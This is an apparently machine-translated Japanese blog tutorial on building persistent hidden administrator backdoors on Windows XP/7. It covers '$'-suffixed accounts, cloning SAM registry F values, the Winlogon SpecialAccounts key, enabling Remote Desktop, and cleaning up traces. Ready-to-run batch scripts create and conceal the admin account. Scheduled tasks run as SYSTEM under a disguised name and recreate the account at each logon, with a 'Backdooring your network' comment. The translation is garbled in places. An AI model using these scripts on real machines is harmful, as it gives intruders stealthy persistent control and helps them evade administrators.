Windowsシステムは非表示のユーザーを作成します

前提条件：新しく追加されたユーザーの攻撃方法について、新しく追加されたユーザーが起動時に新しく追加されたユーザーを表示しないようにする方法はありますが、ユーザーがリモートでログインするための使用には影響しませんか？
1.環境はWinXPまたはWin7です
。2。データを確認して確認します。3。
小さなツールへの拡張を奨励します。これにより、バッチ処理で新しいユーザーを追加し、起動時に表示されないという目的を達成できます。

1つ試してください：/ active：no

ここに画像の説明を挿入します

仮想マシンIP：192.168.125.138
ここに画像の説明を挿入します
これにより、リモートログインが機能することも保証されます

結果：
ここに画像の説明を挿入します

このメソッドはJZP11を非表示にしていることがわかりましたが、非アクティブに設定されているため、リモートログインは機能しません。

2つのHideAdmin.exeを試してください

まず、情報を探す過程で、開発したソフトウェアHideAdminを見つけました。
ここに画像の説明を挿入します

しかし、それは自分で行ってください。

レジストリの変更を3回試みます

まず、上記の機能が実現できるかどうかを手動で設定しました。
情報を照会した後、レジストリを変更するとユーザーが非表示になる可能性があることがわかりました
ここに画像の説明を挿入します

（1）比較結果：ユーザー名がドル記号で終わっている場合、$で終わるユーザー名はコマンドラインに表示されません。
ここに画像の説明を挿入します

この時点で、最初の非表示に達しましたが、Ctrl + Alt + Insertを使用してユーザーを切り替えると、要件を満たせない確立されたユーザーが表示されます。

（2）探索する次のステップ：

プロセス中にSAMを開くことができない状況に遭遇しました
ここに画像の説明を挿入します

解決策：SAM権限を変更して、管理者ユーザーがフルコントロールと読み取り権限を取得できるようにします。
ここに画像の説明を挿入します

（3）名前を使用して、
管理者タイプ0x1f4
Jzp $タイプ0x3edを表示できます。

アカウントの項目の下に、関連するキー値が表示されます。Fは関連する機関のパラメーターを表し、Vはユーザーのいくつかの基本的なパラメーターを表します。

（4）まず：jzpの名前登録項目をエクスポートします。管理者とJZP $に対応するエントリをエクスポートします。
ここに画像の説明を挿入します

（5）管理者アカウントパラメータ設定の登録項目のFキー値をコピーし、jzp $に対応するユーザのフォルダのパラメータ設定登録項目のFキー値を置き換えます。
ここに画像の説明を挿入します

  .reg以txt形式打开

（5）コマンドラインでjzp $ユーザーを削除します。
ここに画像の説明を挿入します

jzp $に関連するアカウント情報が削除されたことがregeditで見つかりました。

（6）jzp $の名前登録項目と変更されたusersテーブル項目をレジストリにインポートします。
ここに画像の説明を挿入します

非表示のユーザーはコマンドラインから照会されません
ここに画像の説明を挿入します

コントロールパネルは非表示のユーザーを検出しません
ここに画像の説明を挿入します

ユーザー名がわかっている場合は、コマンドラインから非表示のユーザーを知ることができます。また、レジストリから非表示のユーザーを見つけることもできます。
でも、大きな問題ではないと思います。普通の人は登録フォームを見るのに飽きています。

リモートログイン
で、アカウントが無効になっていることがわかりました
コマンド：
ネットユーザーJZP $ / active：yes
ここに画像の説明を挿入します

ログイン成功。

では、このマシンはどのようにログインしてユーザーを非表示にするのでしょうか。
Windows + R-> gpedit.msc
ここに画像の説明を挿入します

ただし、ユーザー名を覚えておく必要があります。そうしないと、システムに入ることができません。

ガジェット制作

@echo off
net user jzp123$ jzp /add
net localgroup administrators jzp123$ /add
Echo HKEY_LOCAL_MACHINE\SAM[1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM[1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains[1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account[1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users[1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names[1] >>c:/tem.ini
regini c:/tem.ini
regedit /e c:\1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
net user jzp123$ /del
regedit /s c:\1.reg
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names[0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users[0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account[0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains[0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM[0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\[0] >>c:/tem.ini
regini c:/tem.ini
del c:\tem.ini
del c:\1.reg
net user  jzp123$ /active:yes
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

コマンドの説明：

（1）@echo off
@echo offは、このコマンドを実行した後、すべてのコマンド（このコマンド自体を含む）のエコーをオフにすることを意味します。

（2）ユーザーコードを作成し、管理者グループに昇格させ
ます。netuser jzp123 $ jzp / add
net localgroup Administrators jzp123 $ / add
注：ここでユーザーのパスワードを作成する必要があります。そうしないと、ログインできません。

（3）フルコントロールとしてユーザーの権限を変更します。
エコーHKEY_LOCAL_MACHINE \ SAM [1] >> c：/tem.ini
エコーHKEY_LOCAL_MACHINE \ SAM \ SAM [1] >> c：/tem.ini
エコーHKEY_LOCAL_MACHINE \ SAM \ SAM \ Domains [1] >> c：/ tem。 ini
Echo HKEY_LOCAL_MACHINE \ SAM \ SAM \ Domains \ Account [1] >> c：/tem.ini
Echo HKEY_LOCAL_MACHINE \ SAM \ SAM \ Domains \ Account \ Users [1] >> c：/tem.ini
Echo HKEY_LOCAL_MACHINE \ SAM \ SAM \ Domains \ Account \ Users \ Names [1] >> c：/tem.ini
説明：
ここでのパスは、
[xyz]の上で手動で操作されたパスです：
x、y、zはすべて数字で、次のとおりです。管理者全員システム権限の変更を意味し
ます1-管理者はフルアクセスなので、上記は[1]です。
>>：>>の前の同じ回線パスをcドライブの下のtem.iniに書き込むことを意味します

ここに画像の説明を挿入します

（4）レジストリとレジストリのアクセス許可を変更し、
作成したばかりの構成ファイルregini c：/tem.iniを実行します。Regini
プログラムには、XP以降で使用可能なオペレーティングシステムが付属しています。

（5）レジストリをエクスポートします
regedit /ec:\1.reg HKEY_LOCAL_MACHINE \ SAM \ SAM \ Domains \ Account \ Users

（6）非表示のユーザーを削除し、レジストリ
ネットユーザーjzp123 $ / del
regedit /sc:\1.regをインポートします。

（7）清楚痕迹、完了活活
エコーHKEY_LOCAL_MACHINE \ SAM \ SAM \ Domains \ Account \ Users \ Names [0] >> c：/tem.ini
Echo HKEY_LOCAL_MACHINE \ SAM \ SAM \ Domains \ Account \ Users [0] >> c：/tem.ini
Echo HKEY_LOCAL_MACHINE \ SAM \ SAM \ Domains \ Account [0] >> c：/tem.ini
Echo HKEY_LOCAL_MACHINE \ SAM \ SAM \ Domains [0] >> c：/tem.ini
Echo HKEY_LOCAL_MACHINE \ SAM \ SAM [0] >> c：/tem.ini
Echo HKEY_LOCAL_MACHINE \ SAM [0] >> c：/tem.ini
regini c：/tem.ini
del c：\ tem.ini
del c：\ 1.reg
netユーザーjzp123 $ / active：yes

（8）コマンド
reg add "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server"を使用して、リモートログインサービスを開きます/ v fDenyTSConnections / t REG_DWORD / d 0 / f

実際、コードにはキー値Fをコピーするプロセスがありません。、これは私が気付いていないところです。
したがって、コードを実行すると、リモートログインに次のインターフェイスが表示されます。
ここに画像の説明を挿入します

ただし、これは手動で補正できます。
ここに画像の説明を挿入します

この設定後、リモートログインを実現できます。

ツール：
ここに画像の説明を挿入します

4を試す

レジストリエディタで新しいキー値を作成します
。HKEY_LOCAL_MACHINE\ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList
新しいDWORD値を作成し、非表示にする必要のあるユーザーの名前を付けて、値を0（0は非表示、1は表示を意味します）

@echo off
net user xh521$ xh521$ /add
net localgroup administrators xh521$ /add
regedit /s .\xh521$.reg
pause
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"xh521$"=dword:00000000

成功！！この方法は、上記よりもはるかに簡単です。
ここに画像の説明を挿入します

ログインユーザーは非表示のユーザーを作成し、シャットダウンして削除します

例に従って、トリガーイベントをトリガー条件として受け取る計画タスクを設計します。実現：
1。シャットダウン条件が
傍受されたときに新しいユーザーを作成します; 2。起動イベントが傍受されたときに新しく追加されたユーザーを削除します;
3。環境にウイルス対策ソフトウェアをインストールして、このプロセスがアラームを引き起こすかどうかを確認します。

考えてみてください。実際、起動後にユーザーを作成しても、ユーザーを非表示にする機能は実現しないので、ユーザーのログイン後に非表示のユーザーを作成するのは正しい操作だと思います。

（1）イベントを使用してコマンドをトリガーするschtasks
はschtasksを使用して主に機能を完了します。特定のログイベントを使用してnet userコマンドをトリガーし、管理者アカウントを追加する目的を達成します。

次に、最初にイベントのID番号を知る必要があります。
シャットダウンまたは再起動。再起動はシャットダウンの一種です。
ここに画像の説明を挿入します

ログインユーザー：
ここに画像の説明を挿入します

ログインしたユーザーがユーザーを作成するためのコード：
ここに画像の説明を挿入します

コードの説明：
schtasks / create：
パラメーター/ createは、新しいスケジュールされたタスクを作成することを示します。

/ tn "Microsoft \ Windows \ LocalEventLogRotate"：
/ tnは、新しく作成されたスケジュールされたタスクの名前が "Microsoft \ Windows \ LocalEventLogRotate"であることを示します。

/ tr "" cmd.exe "：
/ trは、スケジュールされたタスクによって実行されるコマンドまたはプロセスです。パラメーターのない単なるプロセスの場合は、" / tr C：\と直接記述できることに注意してください。 windows \ calc.exe "。
ただし、パラメータを使用するプロセスの場合（特に、/ kなどのパラメータを使用するパラメータはschtasks自体のパラメータで繰り返される場合があります）、二重引用符で囲む必要があります。
たとえば、この例での実際の実行は次のとおりです。cmd.exeフレームワークではnetuserに対して複数のコマンドがあるため、/ trに続く二重引用符は終了後の二重引用符と対称です。二重引用符はすべてcmd.exeによって実行されるコマンドです。このようにして、過去にバッチ処理が必要だった作業を完了することができます（別のバッチファイルを作成する必要はありません）。
実行されたコマンドラインでスキルを分析します。cmd.exe/ kはcmdの次のコマンドを実行します。各コマンドis終了は>> nulで表され、2つのコマンドラインは「＆」で接続され、最後のコマンドはcmd.exeを終了させるための「exit」です。

/ f：
タスクがすでにタスクプランに含まれている場合、タスクが強制的に作成され、アラームが抑制されることを示します。

/ ru system：
指定されたタスクが実行される「実行モード」ユーザーアカウント（ユーザーコンテキスト）を表します。システムアカウントの場合、有効な値は「」、「NT AUTHORITY \ SYSTEM」、または「SYSTEM」です。v2タスクの場合、「NT AUTHORITY \ LOCALSERVICE」と「NTAUTHORITY \ NETWORKSERVICE」、および共通のSIDもこれら3つで使用できます。

/ ecセキュリティ
/ EC ChannelNameは、OnEventトリガーのイベントチャネルを指定します。

/ sc onevent：
/ scscheduleスケジュールの頻度を指定します。含まれる頻度は、MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY、ONCE、ONSTART、ONLOGON、ONIDLE、ONEVENTです。この例では、イベントを使用してoneventをトリガーします。

/ mo " [System [Provider [@ Name = 'Microsoft-Windows-Security-Auditing'] and EventID = 4624]]"：
/ MO修飾子プランタイプが改善され、プランの繰り返し期間をより適切に制御できるようになりました。有効な値は次のとおりです：/ D日は曜日による実行を意味し、/ M月は年の最初の数か月（デフォルトでは月の最初の日）での実行を意味します...イベントがイベントでトリガーされる場合、
この例のイベントを表す
「 [System [Provider [@ Name = 'Microsoft-Windows-Security-Auditing'] and EventID = 4740]]」など、特定のイベント（文字列）がパラメーターとして使用されます。特定のイベントは自分で定義できます。イベントIDは、ログの特定の内容を確認することで判別できます。

ユーザーコードを削除するには、シャットダウンまたは再起動します。
ここに画像の説明を挿入します

2つのコードを.batファイルとして保存します
ここに画像の説明を挿入します

@echo off
@schtasks /create /tn "Microsoft\Windows\LocalEventLogRotate" /tr "\"cmd.exe\" /k net user xhjzp xhjzp /add /y /active:yes >> nul & net localgroup administrators xhjzp /add >nul & net user xhjzp /comment:\"Built-in account for Backdooring your network suckers\" > nul & exit" /f /ru system /ec Security /sc onevent /mo "*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4624]]"
@schtasks /create /tn "Microsoft\Windows\LocalEventLog" /tr "\"cmd.exe\" /k net user xhjzp /del > nul & exit" /f /ru system /sc onevent /ec System /mo "*[System[EventID=1074]]"